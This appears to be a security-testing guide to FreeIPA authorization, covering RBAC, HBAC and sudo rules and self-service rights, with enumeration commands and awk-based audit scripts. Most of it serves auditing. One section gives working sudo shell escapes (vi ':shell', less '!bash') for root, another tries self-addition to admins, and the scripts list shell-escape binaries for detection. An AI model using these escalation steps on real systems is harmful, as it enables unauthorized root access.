Authorization Mechanisms

Explore the authorization components of FreeIPA and techniques to test their security.

Role-Based Access Control (RBAC) Overview

Role-Based Access Control (RBAC) is the hierarchical model FreeIPA uses to delegate management of the data it stores. It has three layers: permissions (concrete rights on directory entries), privileges (groups of permissions), and roles (groups of privileges that are assigned to users, user groups, hosts, host groups, or services). The admins group sits outside this model: its members are allowed everything by a directory ACI, so an RBAC review has to cover who can reach admins as well as what the roles grant.

RBAC Structure

Figure: overview of the RBAC structure in FreeIPA.

RBAC Components

FreeIPA's RBAC system consists of several components that work together to control access to resources.

Roles

Roles are collections of privileges. A role is assigned to users, user groups, hosts, host groups, or services (its member attribute), and the members receive every permission reachable through the role's privileges. Built-in examples are User Administrator, helpdesk, and Security Architect.

Privileges

Privileges are collections of permissions that correspond to one administrative task (for example, User Administrators or Password Administrators). Privileges are what roles are built from; they are not assigned to users directly.

Permissions

Permissions are the lowest layer: each one grants a set of rights (read, search, compare, write, add, delete, or all) on a target described by a location subtree, a target filter, and an optional attribute list. FreeIPA writes every permission into the directory as an ACI, so the permission entry under cn=pbac and the aci value on the target subtree are two views of the same grant. The bind rule type decides who the ACI applies to: permission (only holders via privileges and roles), all (any authenticated bind), or anonymous (anyone, including unauthenticated binds).

Enumerating RBAC Components

The three layers live in different subtrees, and the links between them are ordinary group membership: a role's member attribute lists its holders, a privilege's member attribute lists the roles that carry it, and a permission's member attribute lists the privileges that include it (memberOf is maintained in the other direction). All of them can be read with ldapsearch after kinit, or with the ipa CLI (role-find, privilege-find, permission-find, each with --all to include the membership attributes).

Get all roles
ldapsearch -Y gssapi -b "cn=roles,cn=accounts,dc=example,dc=com"
Get all privileges
ldapsearch -Y gssapi -b "cn=privileges,cn=pbac,dc=example,dc=com"
Get all permissions (ipaPermRight, ipaPermLocation, ipaPermTargetFilter and ipaPermBindRuleType describe what each one grants)
ldapsearch -Y gssapi -b "cn=permissions,cn=pbac,dc=example,dc=com"
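As an added example (bash, not code from the FreeIPA project or from this page's author), the script below takes the output of the three searches above in LDIF form and prints the resolved chain for every role: who holds it, which privileges it carries, and which rights each permission grants on which subtree and attributes. It walks the member and memberOf attributes rather than ipa CLI output, so it works on any dump, including one taken offline. It also reports permissions whose bind rule type is all or anonymous while granting write, add, delete or all rights, because those apply to every authenticated (or unauthenticated) bind without any role at all. The sample dump at the end is constructed for the example; the Custom: Anyone Writes Manager permission in it is the constructed misconfiguration, and dc=example,dc=com is the suffix used throughout this page.

```shell
#!/usr/bin/env bash
# Added example, not FreeIPA project code: resolve holder -> role -> privilege -> permission
# chains from an LDIF dump of cn=roles,cn=accounts and cn=pbac, and flag permissions bound to
# "all" (any authenticated bind) or "anonymous" that grant write-class rights.
# Live use (after kinit):
#   { ldapsearch -LLL -Y gssapi -b "cn=roles,cn=accounts,dc=example,dc=com";
#     ldapsearch -LLL -Y gssapi -b "cn=pbac,dc=example,dc=com"; } | rbac_chains
set -e

# Join LDIF continuation lines (a line starting with a space continues the previous one).
ldif_unfold() {
  awk '/^ / { printf "%s", substr($0, 2); next } NR > 1 { print "" } { printf "%s", $0 } END { print "" }' "$@"
}

# rbac_chains [FILE...]: read LDIF from FILE(s) or stdin, print the resolved chains and warnings.
rbac_chains() {
  ldif_unfold "$@" | awk '
    function rdn(d,   s) { s = d; sub(/,.*/, "", s); sub(/^[^=]*=/, "", s); return s }
    function kind_of(d) {
      if (d ~ /^uid=/) return "user"; if (d ~ /,cn=groups,/) return "group"
      if (d ~ /,cn=computers,/) return "host"; if (d ~ /,cn=hostgroups,/) return "hostgroup"
      return (d ~ /^krbprincipalname=/) ? "service" : "other"
    }
    # Store the entry that just ended, keyed by DN, according to the container it lives in.
    function flush() {
      if (dn ~ /,cn=roles,cn=accounts,/) { roles[++nroles] = dn; holders[dn] = member; privs_of[dn] = memberof }
      else if (dn ~ /,cn=privileges,cn=pbac,/) { perms_of[dn] = memberof }
      else if (dn ~ /,cn=permissions,cn=pbac,/) { right[dn] = rights; bind[dn] = bindtype; loc[dn] = location; attrs[dn] = incl }
      dn = ""; member = ""; memberof = ""; rights = ""; bindtype = ""; location = ""; incl = ""
    }
    /^$/ { flush(); next }
    {
      a = tolower($1); sub(/:+$/, "", a)      # attribute name (base64 "::" values are left undecoded)
      v = $0; sub(/^[^:]*:+ */, "", v)        # attribute value
      if (a == "dn") dn = v
      else if (a == "member") member = member "|" v
      else if (a == "memberof") memberof = memberof "|" v
      else if (a == "ipapermright") rights = rights " " v
      else if (a == "ipapermbindruletype") bindtype = tolower(v)
      else if (a == "ipapermlocation") location = v
      else if (a == "ipapermincludedattr") incl = incl " " v
    }
    END {
      flush()
      for (i = 1; i <= nroles; i++) {
        r = roles[i]; print "role: " rdn(r)
        n = split(holders[r], h, "|")
        for (j = 1; j <= n; j++) if (h[j] != "") print "  held by: " h[j] " (" kind_of(h[j]) ")"
        n = split(privs_of[r], pv, "|")
        for (j = 1; j <= n; j++) {
          if (pv[j] !~ /,cn=privileges,cn=pbac,/) continue   # memberOf may be indirect; keep privileges only
          print "  privilege: " rdn(pv[j])
          m = split(perms_of[pv[j]], pm, "|")
          for (k = 1; k <= m; k++) {
            if (pm[k] !~ /,cn=permissions,cn=pbac,/) continue
            extra = (attrs[pm[k]] != "") ? " attrs:" attrs[pm[k]] : ""
            print "    permission: " rdn(pm[k]) " rights:" right[pm[k]] " on " loc[pm[k]] extra
          }
        }
      }
      # Bind rule types all and anonymous apply without any role, so broad write rights there are a finding.
      for (p in right)
        if ((bind[p] == "all" || bind[p] == "anonymous") && right[p] ~ /write|add|delete|all/) {
          extra = (attrs[p] != "") ? " attrs:" attrs[p] : ""
          print "WARNING: " rdn(p) " grants" right[p] " to bind rule type " bind[p] " on " loc[p] extra
        }
    }'
}

# Constructed sample dump (not from a real server). The last permission is the deliberate
# misconfiguration: every authenticated bind may write the manager attribute of any user.
sample_ldif() {
  cat <<'EOF'
dn: cn=User Administrator,cn=roles,cn=accounts,dc=example,dc=com
member: uid=bob,cn=users,cn=accounts,dc=example,dc=com
member: cn=helpdesk,cn=groups,cn=accounts,dc=example,dc=com
memberOf: cn=User Administrators,cn=privileges,cn=pbac,dc=example,dc=com
memberOf: cn=System: Add Users,cn=permissions,cn=pbac,dc=example,dc=com

dn: cn=User Administrators,cn=privileges,cn=pbac,dc=example,dc=com
member: cn=User Administrator,cn=roles,cn=accounts,dc=example,dc=com
memberOf: cn=System: Add Users,cn=permissions,cn=pbac,dc=example,dc=com

dn: cn=System: Add Users,cn=permissions,cn=pbac,dc=example,dc=com
ipaPermRight: add
ipaPermBindRuleType: permission
ipaPermLocation: cn=users,cn=accounts,dc=example,dc=com

dn: cn=Custom: Anyone Writes Manager,cn=permissions,cn=pbac,dc=example,dc=com
ipaPermRight: write
ipaPermBindRuleType: all
ipaPermLocation: cn=users,cn=accounts,dc=example,dc=com
ipaPermIncludedAttr: manager
EOF
}

sample_ldif | rbac_chains
```

Feed it the real searches with -LLL so that ldapsearch emits plain LDIF; the ipa CLI output is formatted differently and is not parsed here. A permission that shows up only in the WARNING section and in no role chain is exactly the kind of grant a role-centric review misses.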

Host-Based Access Control (HBAC) Rules

Host-Based Access Control (HBAC) rules define which users may log in to which hosts through which PAM services. They are allow rules: access is granted when at least one enabled rule matches the user, the host, and the service, and denied otherwise. A fresh installation ships with an enabled rule named allow_all that matches everything, so until it is disabled HBAC restricts nothing. The rules are stored centrally but enforced by SSSD on each enrolled host (pam_sss with the ipa access provider); a host that does not run SSSD with that provider, or that authenticates by other means, is not covered by them.

HBAC Rule Components

HBAC rules consist of several components that work together to control access to hosts and services.

Users

The users or user groups that the rule applies to.

Hosts

The hosts or host groups that the rule applies to.

Services

The PAM services the rule applies to (sshd, login, su, sudo, ftp and so on) or HBAC service groups; the built-in Sudo group, for example, bundles sudo and sudo-i.

Enumerating and Testing HBAC Rules

Rules are entries directly under cn=hbac; services and service groups live under cn=hbacservices,cn=hbac and cn=hbacservicegroups,cn=hbac. The attributes to read on each rule are ipaEnabledFlag, userCategory, hostCategory and serviceCategory (a value of all on any of them means "everything"), plus memberUser, memberHost and memberService for the explicit members. The ipa CLI equivalents are hbacrule-find --all and, for evaluating one concrete user/host/service triple the way an enrolled host would, hbactest --user=<user> --host=<fqdn> --service=<service>.

Get all HBAC Rules
ldapsearch -Y gssapi -b "cn=hbac,dc=example,dc=com"

HBAC Testing Tip:

The findings that matter most are enabled rules with a category of all (the stock allow_all first of all), rules that reach sensitive hosts or host groups through a broad user group, and rules whose service is a whole service group rather than a single service. Confirm each candidate with ipa hbactest for a low-privileged user against the sensitive host, since nested groups and service groups make the effective result hard to read from the rule alone.

HBAC Rule Structure

Figure: structure of an HBAC rule in FreeIPA.

Sudo Rules

Sudo rules in FreeIPA define which users can run which commands with elevated privileges on which hosts. Enrolled hosts fetch them through SSSD's sudo provider, so a rule changed on the server applies everywhere without touching /etc/sudoers. Compared with HBAC rules they carry more detail: the allowed (and denied) commands or command groups, the "run as" user and group, and sudoers options. A rule with no run-as value behaves like a sudoers entry without one, so the command runs as root.

Sudo Rule Components

Sudo rules consist of several components that work together to control command execution with elevated privileges.

Users

The users or user groups that the rule applies to.

Hosts

The hosts or host groups that the rule applies to.

Commands

The commands (full paths, optionally with fixed arguments) or sudo command groups that may be run; a command category of all allows any command.

Run As

The user, and optionally the group, that the commands run as (for example root). A run-as user category of all lets the caller pick any user with sudo -u.

Options

Additional sudoers options in sudo's own syntax, for example !authenticate (the FreeIPA form of NOPASSWD) or !requiretty.

Enumerating and Testing Sudo Rules

Rules are entries under cn=sudorules,cn=sudo. The commands they reference are separate entries under cn=sudocmds,cn=sudo (attribute sudoCmd) and cn=sudocmdgroups,cn=sudo, so resolving memberAllowCmd and memberDenyCmd values needs those subtrees as well. The schema-compat plugin additionally publishes the same rules in classic sudoers-LDAP form (sudoUser, sudoHost, sudoCommand, sudoOption) under ou=sudoers,dc=example,dc=com; check what your bind can read there too. From the server side ipa sudorule-find --all lists the rules; on an enrolled host sudo -l shows the ones that apply to the current user.

Get all Sudo Rules
ldapsearch -Y gssapi -b "cn=sudorules,cn=sudo,dc=example,dc=com"

Sudo Rule Testing Tip:

Look first for enabled rules with a command category of all, a run-as user category of all, or the !authenticate option, and for rules whose user or host side is all. Then inspect every allowed command for a binary that can spawn a shell or write arbitrary files: editors (vi, vim), pagers (less, more, man) and tools that accept commands or callbacks (find, awk, sed, perl, python, tar) are the usual suspects, and GTFOBins keeps a longer catalogue. Pinning the arguments in the rule does not help when the escape happens inside the program; the noexec sudo option is what stops a dynamically linked program from launching a child shell.
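An added example (bash, not code from the FreeIPA project or from this page) that applies the two testing tips above to an LDIF dump of cn=hbac and cn=sudo: it skips disabled rules, flags enabled HBAC rules that use a category of all (naming the stock allow_all case), and for sudo rules flags a command category of all, the !authenticate option, all-users or all-hosts scope, a run-as category of all, and any allowed command whose binary is on a short list of known shell escapes, resolving command DNs through cn=sudocmds and expanding sudo command groups. The escape list is an assumed subset, the sample dump is constructed, and the UUID and rule names in it are invented for the example. Evaluating a concrete user/host/service triple the way a host does remains the job of ipa hbactest; this script finds the candidates to feed it.

```shell
#!/usr/bin/env bash
# Added example, not FreeIPA project code: audit HBAC and sudo rules from an LDIF dump of
# cn=hbac and cn=sudo. Enabled rules are flagged when they use category "all", skip
# authentication, or allow a binary that can spawn a shell.
# Live use (after kinit):
#   { ldapsearch -LLL -Y gssapi -b "cn=hbac,dc=example,dc=com";
#     ldapsearch -LLL -Y gssapi -b "cn=sudo,dc=example,dc=com"; } | audit_rules
set -e

# Join LDIF continuation lines (a line starting with a space continues the previous one).
ldif_unfold() {
  awk '/^ / { printf "%s", substr($0, 2); next } NR > 1 { print "" } { printf "%s", $0 } END { print "" }' "$@"
}

# audit_rules [FILE...]: one line per rule or finding; disabled rules are skipped.
audit_rules() {
  ldif_unfold "$@" | awk '
    function rdn(d,   s) { s = d; sub(/,.*/, "", s); sub(/^[^=]*=/, "", s); return s }
    function val(d, attr) { return A[tolower(d), attr] }      # values are stored as |v1|v2|
    function has(d, attr, v) { return index(tolower(val(d, attr)), "|" tolower(v) "|") > 0 }
    function names(d, attr,   m, arr, j, out, sep) {
      m = split(val(d, attr), arr, "|")
      for (j = 1; j <= m; j++) if (arr[j] != "") { sep = (out == "") ? "" : ","; out = out sep rdn(arr[j]) }
      return (out == "") ? "-" : out
    }
    # Resolve a memberAllowCmd DN to its command line (expanding sudo command groups) and
    # flag it when the binary is a known shell escape (short assumed list; GTFOBins has more).
    function check_cmd(name, cdn,   c, b, m, arr, j) {
      c = val(cdn, "sudocmd")
      if (c == "") { m = split(val(cdn, "member"), arr, "|"); for (j = 1; j <= m; j++) if (arr[j] != "") check_cmd(name, arr[j]); return }
      gsub(/\|/, "", c); b = c; sub(/ .*/, "", b); sub(/.*\//, "", b)
      if (b in escape) print name ": FINDING allows " c " (shell escape via " b ")"
    }
    BEGIN { split("vi vim less more man find awk sed python python3 perl bash sh", e, " "); for (i in e) escape[e[i]] = 1 }
    /^$/ { key = ""; next }
    {
      a = tolower($1); sub(/:+$/, "", a)      # attribute name (base64 "::" values are left undecoded)
      v = $0; sub(/^[^:]*:+ */, "", v)
      if (a == "dn") { key = tolower(v); ents[++n] = v; next }
      if (key != "") A[key, a] = (A[key, a] == "" ? "|" : A[key, a]) v "|"
    }
    END {
      for (i = 1; i <= n; i++) {
        d = ents[i]
        if (!has(d, "ipaenabledflag", "TRUE")) continue
        if (has(d, "objectclass", "ipaHBACRule")) {
          name = "HBAC " rdn(d)
          u = has(d, "usercategory", "all"); h = has(d, "hostcategory", "all"); s = has(d, "servicecategory", "all")
          if (u && h && s) print name ": FINDING every user, every host, every service (the stock allow_all left enabled?)"
          else if (u) print name ": FINDING every user may reach hosts=" names(d, "memberhost") " services=" names(d, "memberservice")
          else if (h) print name ": WARN users=" names(d, "memberuser") " may reach every host via services=" names(d, "memberservice")
          else print name ": ok users=" names(d, "memberuser") " hosts=" names(d, "memberhost") " services=" names(d, "memberservice")
        } else if (has(d, "objectclass", "ipaSudoRule")) {
          name = "SUDO " rdn(d)
          if (has(d, "cmdcategory", "all")) print name ": FINDING any command"
          if (has(d, "ipasudoopt", "!authenticate")) print name ": FINDING no password required (!authenticate)"
          if (has(d, "usercategory", "all")) print name ": FINDING applies to every user"
          if (has(d, "hostcategory", "all")) print name ": WARN applies on every enrolled host"
          if (has(d, "ipasudorunasusercategory", "all")) print name ": WARN may run as any user"
          m = split(val(d, "memberallowcmd"), arr, "|")
          for (j = 1; j <= m; j++) if (arr[j] != "") check_cmd(name, arr[j])
        }
      }
    }'
}

# Constructed sample dump (not from a real server): the stock allow_all rule left enabled, a
# tidy helpdesk rule, a disabled leftover, and a sudo rule that lets helpdesk run less as
# root without a password on every host.
sample_ldif() {
  cat <<'EOF'
dn: cn=allow_all,cn=hbac,dc=example,dc=com
objectClass: ipahbacrule
ipaEnabledFlag: TRUE
userCategory: all
hostCategory: all
serviceCategory: all

dn: cn=helpdesk_ssh,cn=hbac,dc=example,dc=com
objectClass: ipahbacrule
ipaEnabledFlag: TRUE
memberUser: cn=helpdesk,cn=groups,cn=accounts,dc=example,dc=com
memberHost: cn=webservers,cn=hostgroups,cn=accounts,dc=example,dc=com
memberService: cn=sshd,cn=hbacservices,cn=hbac,dc=example,dc=com

dn: cn=legacy_all,cn=hbac,dc=example,dc=com
objectClass: ipahbacrule
ipaEnabledFlag: FALSE
userCategory: all

dn: ipaUniqueID=5f1c2b3a-7d6e-4c8f-9a0b-1e2d3c4b5a69,cn=sudocmds,cn=sudo,dc=example,dc=com
objectClass: ipasudocmd
sudoCmd: /usr/bin/less /var/log/messages

dn: cn=helpdesk_logs,cn=sudorules,cn=sudo,dc=example,dc=com
objectClass: ipasudorule
ipaEnabledFlag: TRUE
hostCategory: all
memberUser: cn=helpdesk,cn=groups,cn=accounts,dc=example,dc=com
memberAllowCmd: ipaUniqueID=5f1c2b3a-7d6e-4c8f-9a0b-1e2d3c4b5a69,cn=sudocmds,cn=sudo,dc=example,dc=com
ipaSudoOpt: !authenticate
EOF
}

sample_ldif | audit_rules
```

The sudo rule in the sample is the pattern the tip warns about: the argument is pinned to one log file, but less still hands the helpdesk group a root shell, and !authenticate removes the password prompt that would otherwise slow an attacker who only has a stolen session.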

Exploiting Sudo Rules

Misconfigured sudo rules can be exploited to gain elevated privileges on a system. The escapes below work because the editor or pager itself launches a shell, which inherits the root privileges sudo granted; invoke the command exactly as the rule allows it (including any fixed arguments), otherwise sudo refuses to run it.

Exploit a sudo rule that allows running vi as root
sudo vi
# then inside vi:
:set shell=/bin/bash
:shell
Exploit a sudo rule that allows running less as root
sudo less /etc/passwd
# then inside less:
!bash

Permission Analysis

Analyzing permissions in FreeIPA can reveal potential security weaknesses or misconfigurations that could be exploited.

Self-Service Capabilities

FreeIPA includes self-service capabilities (listed by ipa selfservice-find) that let users modify attributes of their own entry. The stock rules cover personal details and, by default, the user's own SSH public keys. Anything beyond that deserves scrutiny, because attributes such as uidNumber, gidNumber, homeDirectory and loginShell are what SSSD hands to every enrolled host, and mail and manager feed notification and approval flows.

Attempt to modify an attribute of your own entry (expected to fail with an ACI error if self-service does not cover that attribute)
ipa user-mod --manager=admin <your_username>
Attempt to add yourself to the admins group (expected to fail unless you already hold group-membership rights over admins)
ipa group-add-member --users=<your_username> admins
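An added example (bash, not code from the FreeIPA project or from this page) of a more systematic version of the self-service check: instead of trying modifications one at a time, it reads the output of ipa user-show <you> --rights --all, pulls the attributelevelrights dictionary, keeps the attributes whose rights string contains w (write), and sorts them into tiers by what a self-write would allow. The tiers and the attribute lists behind them are an assumed ranking to adapt per environment, and the user-show output at the end is constructed for the example, not captured from a server.

```shell
#!/usr/bin/env bash
# Added example, not FreeIPA project code: list the attributes of your own entry that your
# current bind is allowed to write, taken from the attributelevelrights field printed by
# "ipa user-show <you> --rights --all", and rank them by what a self-write would buy.
# Live use (after kinit):  ipa user-show "$(id -un)" --rights --all | self_writable
set -e

# Assumed ranking, adjust per environment. Attributes below are consumed by SSSD or by other
# systems, so a user who can set them changes how every enrolled host treats the account.
critical="uidnumber gidnumber krbprincipalname krbprincipalexpiration nsaccountlock ipantsecurityidentifier"
review="ipasshpubkey mail manager loginshell homedirectory krbpasswordexpiration"

# self_writable: stdin is the ipa user-show output; prints "<TIER> <attribute> (<rights>)".
self_writable() {
  # attributelevelrights is printed as a Python dict, e.g. {'cn': 'rscwo', 'uidnumber': 'rsc', ...};
  # the letter w in a rights string means the current bind may write that attribute.
  grep -i '^ *attributelevelrights:' | grep -oE "u?'[^']+': u?'[^']*'" \
    | sed -E "s/^u?'([^']+)': u?'([^']*)'$/\1 \2/" \
    | while read -r attr rights; do
        case "$rights" in *w*) ;; *) continue ;; esac
        attr=$(printf '%s' "$attr" | tr 'A-Z' 'a-z')
        tier=INFO
        case " $review " in *" $attr "*) tier=REVIEW ;; esac
        case " $critical " in *" $attr "*) tier=CRITICAL ;; esac
        printf '%s %s (%s)\n' "$tier" "$attr" "$rights"
      done | sort
}

# Constructed sample of the relevant part of "ipa user-show bob --rights --all" (not real output).
sample_user_show() {
  cat <<'EOF'
  User login: bob
  First name: Bob
  Last name: Example
  Home directory: /home/bob
  Login shell: /bin/bash
  UID: 1423000003
  GID: 1423000003
  attributelevelrights: {'cn': 'rscwo', 'displayname': 'rscwo', 'gecos': 'rscwo', 'gidnumber': 'rsc', 'homedirectory': 'rsc', 'ipasshpubkey': 'rscwo', 'loginshell': 'rscwo', 'mail': 'rscwo', 'manager': 'rscwo', 'uidnumber': 'rsc'}
EOF
}

sample_user_show | self_writable
```

Run it against your own account first, then against any service or shared account you can bind as; a CRITICAL line is an immediate escalation path, a REVIEW line needs a look at which downstream system trusts that attribute.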

Self-Service Abuse Note:

Self-service ACIs bind on userdn = ldap:///self, so they bypass the role model entirely: a user holds them simply by being that user. Enumerate them with ipa selfservice-find --all and compare the attribute lists against what other systems trust. The fastest check for your own account is ipa user-show <your_username> --rights --all, whose attributelevelrights field lists, per attribute, the rights the current bind actually has (w means writable). Also review the delegation rules (ipa delegation-find), which grant one group write access to attributes of another group's members.

Permission Escalation Paths

Analyzing permissions can reveal paths from a limited role to full control of the domain. The ones to trace: any permission that can write the member attribute of cn=admins (check whether the target filter of group-membership permissions excludes that group), any password-reset permission that is not restricted away from admins, permissions over sudo rules or HBAC rules (writing those is root on every enrolled host), and permissions to manage host or service keytabs or to issue certificates for arbitrary principals (those yield credentials for other identities). A permission is only reachable through a privilege that sits in a role someone holds, so walk the chain in both directions: from the permission's member privileges to their member roles to the role holders, and from a user's memberOf roles outward.

Find permissions that grant write-class rights (permissions live under cn=pbac, not cn=accounts)
ldapsearch -Y gssapi -b "cn=permissions,cn=pbac,dc=example,dc=com" -s sub "(&(objectClass=ipaPermission)(|(ipaPermRight=write)(ipaPermRight=add)(ipaPermRight=delete)(ipaPermRight=all)))"
Check which roles a user holds, then what those roles carry
ipa user-show <username> --all | grep -iE 'role|privilege'
ipa role-show <role> --all
ipa privilege-show <privilege> --all
Permission Analysis Process

Figure: the permission analysis process in FreeIPA.